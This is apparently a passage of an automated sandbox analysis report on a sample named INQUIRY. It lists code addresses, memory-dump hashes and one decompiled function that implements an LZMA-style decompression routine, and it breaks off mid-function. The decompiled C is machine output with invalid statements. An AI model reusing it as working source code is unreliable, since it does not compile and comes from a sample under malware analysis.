                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x004066b5
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                          • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00405E9D(void* __ecx) {
                          				void* _v8;
                          				void* _v12;
                          				signed int _v16;
                          				unsigned int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v95;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				intOrPtr _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				void _v140;
                          				void* _v148;
                          				signed int _t537;
                          				signed int _t538;
                          				signed int _t572;
                          
                          				_t572 = 0x22;
                          				_v148 = __ecx;
                          				memcpy( &_v140, __ecx, _t572 << 2);
                          				if(_v52 == 0xffffffff) {
                          					return 1;
                          				}
                          				while(1) {
                          					L3:
                          					_t537 = _v140;
                          					if(_t537 > 0x1c) {
                          						break;
                          					}
                          					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                          						case 0:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v116 = _v116 + 1;
                          							_t537 =  *_v116;
                          							__eflags = _t537 - 0xe1;
                          							if(_t537 > 0xe1) {
                          								goto L174;
                          							}
                          							_t542 = _t537 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t576);
                          							_push(9);
                          							_pop(_t577);
                          							_t622 = _t542 / _t576;
                          							_t544 = _t542 % _t576 & 0x000000ff;
                          							asm("cdq");
                          							_t617 = _t544 % _t577 & 0x000000ff;
                          							_v64 = _t617;
                          							_v32 = (1 << _t622) - 1;
                          							_v28 = (1 << _t544 / _t577) - 1;
                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                          							__eflags = 0x600 - _v124;
                          							if(0x600 == _v124) {
                          								L12:
                          								__eflags = _t625;
                          								if(_t625 == 0) {
                          									L14:
                          									_v76 = _v76 & 0x00000000;
                          									_v68 = _v68 & 0x00000000;
                          									goto L17;
                          								} else {
                          									goto L13;
                          								}
                          								do {
                          									L13:
                          									_t625 = _t625 - 1;
                          									__eflags = _t625;
                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                          								} while (_t625 != 0);
                          								goto L14;
                          							}
                          							__eflags = _v8;
                          							if(_v8 != 0) {
                          								GlobalFree(_v8);
                          							}
                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                          							__eflags = _t537;
                          							_v8 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								_v124 = 0x600;
                          								goto L12;
                          							}
                          						case 1:
                          							L15:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 1;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                          							_v116 = _v116 + 1;
                          							_t50 =  &_v76;
                          							 *_t50 = _v76 + 1;
                          							__eflags =  *_t50;
                          							L17:
                          							__eflags = _v76 - 4;
                          							if(_v76 < 4) {
                          								goto L15;
                          							}
                          							_t550 = _v68;
                          							__eflags = _t550 - _v120;
                          							if(_t550 == _v120) {
                          								L22:
                          								_v76 = 5;
                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                          								goto L25;
                          							}
                          							__eflags = _v12;
                          							_v120 = _t550;
                          							if(_v12 != 0) {
                          								GlobalFree(_v12);
                          							}
                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                          							__eflags = _t537;
                          							_v12 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								goto L22;
                          							}
                          						case 2:
                          							L26:
                          							_t557 = _v100 & _v32;
                          							_v136 = 6;
                          							_v80 = _t557;
                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                          							goto L135;
                          						case 3:
                          							L23:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 3;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_t72 =  &_v116;
                          							 *_t72 = _v116 + 1;
                          							__eflags =  *_t72;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L25:
                          							_v76 = _v76 - 1;
                          							__eflags = _v76;
                          							if(_v76 != 0) {
                          								goto L23;
                          							}
                          							goto L26;
                          						case 4:
                          							L136:
                          							_t559 =  *_t626;
                          							_t610 = _t559 & 0x0000ffff;
                          							_t591 = (_v20 >> 0xb) * _t610;
                          							__eflags = _v16 - _t591;
                          							if(_v16 >= _t591) {
                          								_v20 = _v20 - _t591;
                          								_v16 = _v16 - _t591;
                          								_v68 = 1;
                          								_t560 = _t559 - (_t559 >> 5);
                          								__eflags = _t560;
                          								 *_t626 = _t560;
                          							} else {
                          								_v20 = _t591;
                          								_v68 = _v68 & 0x00000000;
                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L142;
                          							} else {
                          								goto L140;
                          							}
                          						case 5:
                          							L140:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 5;
                          								goto L173;
                          							}
                          							_v20 = _v20 << 8;
                          							_v112 = _v112 - 1;
                          							_t464 =  &_v116;
                          							 *_t464 = _v116 + 1;
                          							__eflags =  *_t464;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L142:
                          							_t561 = _v136;
                          							goto L143;
                          						case 6:
                          							__edx = 0;
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v56 = 1;
                          								_v136 = 7;
                          								__esi = _v8 + 0x180 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v96 & 0x000000ff;
                          							__esi = _v100;
                          							__cl = 8;
                          							__cl = 8 - _v64;
                          							__esi = _v100 & _v28;
                          							__eax = (_v96 & 0x000000ff) >> 8;
                          							__ecx = _v64;
                          							__esi = (_v100 & _v28) << 8;
                          							__ecx = _v8;
                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                          							__eflags = _v60 - 4;
                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							if(_v60 >= 4) {
                          								__eflags = _v60 - 0xa;
                          								if(_v60 >= 0xa) {
                          									_t103 =  &_v60;
                          									 *_t103 = _v60 - 6;
                          									__eflags =  *_t103;
                          								} else {
                          									_v60 = _v60 - 3;
                          								}
                          							} else {
                          								_v60 = 0;
                          							}
                          							__eflags = _v56 - __edx;
                          							if(_v56 == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L63;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__ecx = _v12;
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                          							goto L43;
                          						case 7:
                          							__eflags = _v68 - 1;
                          							if(_v68 != 1) {
                          								__eax = _v40;
                          								_v132 = 0x16;
                          								_v36 = _v40;
                          								__eax = _v44;
                          								_v40 = _v44;
                          								__eax = _v48;
                          								_v44 = _v48;
                          								__eax = 0;
                          								__eflags = _v60 - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                          								__eax = _v8;
                          								__eax = _v8 + 0x664;
                          								__eflags = __eax;
                          								_v92 = __eax;
                          								goto L71;
                          							}
                          							__eax = _v8;
                          							__ecx = _v60;
                          							_v136 = 8;
                          							__esi = _v8 + 0x198 + _v60 * 2;
                          							goto L135;
                          						case 8:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xa;
                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                          							} else {
                          								__eax = _v60;
                          								__ecx = _v8;
                          								__eax = _v60 + 0xf;
                          								_v136 = 9;
                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                          							}
                          							goto L135;
                          						case 9:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								goto L92;
                          							}
                          							__eflags = _v100;
                          							if(_v100 == 0) {
                          								goto L174;
                          							}
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							_t264 = _v60 - 7 >= 0;
                          							__eflags = _t264;
                          							0 | _t264 = _t264 + _t264 + 9;
                          							_v60 = _t264 + _t264 + 9;
                          							goto L78;
                          						case 0xa:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xb;
                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v44;
                          							goto L91;
                          						case 0xb:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__ecx = _v40;
                          								__eax = _v36;
                          								_v36 = _v40;
                          							} else {
                          								__eax = _v40;
                          							}
                          							__ecx = _v44;
                          							_v40 = _v44;
                          							L91:
                          							__ecx = _v48;
                          							_v48 = __eax;
                          							_v44 = _v48;
                          							L92:
                          							__eax = _v8;
                          							_v132 = 0x15;
                          							__eax = _v8 + 0xa68;
                          							_v92 = _v8 + 0xa68;
                          							goto L71;
                          						case 0xc:
                          							L102:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xc;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t340 =  &_v116;
                          							 *_t340 = _v116 + 1;
                          							__eflags =  *_t340;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							__eax = _v48;
                          							goto L104;
                          						case 0xd:
                          							L39:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xd;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t127 =  &_v116;
                          							 *_t127 = _v116 + 1;
                          							__eflags =  *_t127;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L41:
                          							__eax = _v68;
                          							__eflags = _v76 - _v68;
                          							if(_v76 != _v68) {
                          								goto L50;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L56;
                          							}
                          							L43:
                          							__eax = _v95 & 0x000000ff;
                          							_v95 = _v95 << 1;
                          							__ecx = _v92;
                          							__eax = (_v95 & 0x000000ff) >> 7;
                          							_v76 = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi = _v92 + __eax * 2;
                          							_v20 = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edx;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_v68 = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								_v68 = _v68 & 0x00000000;
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L41;
                          							} else {
                          								goto L39;
                          							}
                          						case 0xe:
                          							L48:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xe;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t161 =  &_v116;
                          							 *_t161 = _v116 + 1;
                          							__eflags =  *_t161;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							while(1) {
                          								L50:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax = _v92;
                          								__edx = __ebx + __ebx;
                          								__ecx = _v20;
                          								__esi = __edx + __eax;
                          								__ecx = _v20 >> 0xb;
                          								__ax =  *__esi;
                          								_v88 = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = (_v20 >> 0xb) * __edi;
                          								__eflags = _v16 - __ecx;
                          								if(_v16 >= __ecx) {
                          									_v20 = _v20 - __ecx;
                          									_v16 = _v16 - __ecx;
                          									__cx = __ax;
                          									_t175 = __edx + 1; // 0x1
                          									__ebx = _t175;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									_v20 = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								_v72 = __ebx;
                          								if(_v20 >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L48;
                          								}
                          							}
                          							L56:
                          							_t178 =  &_v56;
                          							 *_t178 = _v56 & 0x00000000;
                          							__eflags =  *_t178;
                          							goto L57;
                          						case 0xf:
                          							L60:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xf;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t208 =  &_v116;
                          							 *_t208 = _v116 + 1;
                          							__eflags =  *_t208;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L62:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L57:
                          								__al = _v72;
                          								_v96 = _v72;
                          								goto L58;
                          							}
                          							L63:
                          							__eax = _v92;
                          							__edx = __ebx + __ebx;
                          							__ecx = _v20;
                          							__esi = __edx + __eax;
                          							__ecx = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_t222 = __edx + 1; // 0x1
                          								__ebx = _t222;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L62;
                          							} else {
                          								goto L60;
                          							}
                          						case 0x10:
                          							L112:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x10;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t371 =  &_v116;
                          							 *_t371 = _v116 + 1;
                          							__eflags =  *_t371;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							goto L114;
                          						case 0x11:
                          							L71:
                          							__esi = _v92;
                          							_v136 = 0x12;
                          							goto L135;
                          						case 0x12:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v92;
                          								_v136 = 0x13;
                          								__esi = _v92 + 2;
                          								L135:
                          								_v88 = _t626;
                          								goto L136;
                          							}
                          							__eax = _v80;
                          							_v52 = _v52 & 0x00000000;
                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							__eflags = __eax;
                          							__eax = _v92 + __eax + 4;
                          							goto L133;
                          						case 0x13:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								_t475 =  &_v92;
                          								 *_t475 = _v92 + 0x204;
                          								__eflags =  *_t475;
                          								_v52 = 0x10;
                          								_v68 = 8;
                          								L147:
                          								_v128 = 0x14;
                          								goto L148;
                          							}
                          							__eax = _v80;
                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							_v52 = 8;
                          							__eax = _v92 + (_v80 << 4) + 0x104;
                          							L133:
                          							_v92 = __eax;
                          							_v68 = 3;
                          							goto L147;
                          						case 0x14:
                          							_v52 = _v52 + __ebx;
                          							__eax = _v132;
                          							goto L143;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                          							goto L123;
                          						case 0x16:
                          							__eax = _v52;
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx = _v8;
                          							_v68 = 6;
                          							__eax = __eax << 7;
                          							_v128 = 0x19;
                          							_v92 = __eax;
                          							goto L148;
                          						case 0x17:
                          							L148:
                          							__eax = _v68;
                          							_v84 = 1;
                          							_v76 = _v68;
                          							goto L152;
                          						case 0x18:
                          							L149:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x18;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t490 =  &_v116;
                          							 *_t490 = _v116 + 1;
                          							__eflags =  *_t490;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L151:
                          							_t493 =  &_v76;
                          							 *_t493 = _v76 - 1;
                          							__eflags =  *_t493;
                          							L152:
                          							__eflags = _v76;
                          							if(_v76 <= 0) {
                          								__ecx = _v68;
                          								__ebx = _v84;
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx = _v84 - (1 << __cl);
                          								__eax = _v128;
                          								_v72 = __ebx;
                          								L143:
                          								_v140 = _t561;
                          								goto L3;
                          							}
                          							__eax = _v84;
                          							_v20 = _v20 >> 0xb;
                          							__edx = _v84 + _v84;
                          							__eax = _v92;
                          							__esi = __edx + __eax;
                          							_v88 = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								_v84 = __edx;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								_v84 = _v84 << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L151;
                          							} else {
                          								goto L149;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								_v48 = __ebx;
                          								L122:
                          								_t399 =  &_v48;
                          								 *_t399 = _v48 + 1;
                          								__eflags =  *_t399;
                          								L123:
                          								__eax = _v48;
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									_v52 = _v52 | 0xffffffff;
                          									goto L173;
                          								}
                          								__eflags = __eax - _v100;
                          								if(__eax > _v100) {
                          									goto L174;
                          								}
                          								_v52 = _v52 + 2;
                          								__eax = _v52;
                          								_t406 =  &_v100;
                          								 *_t406 = _v100 + _v52;
                          								__eflags =  *_t406;
                          								goto L126;
                          							}
                          							__ecx = __ebx;
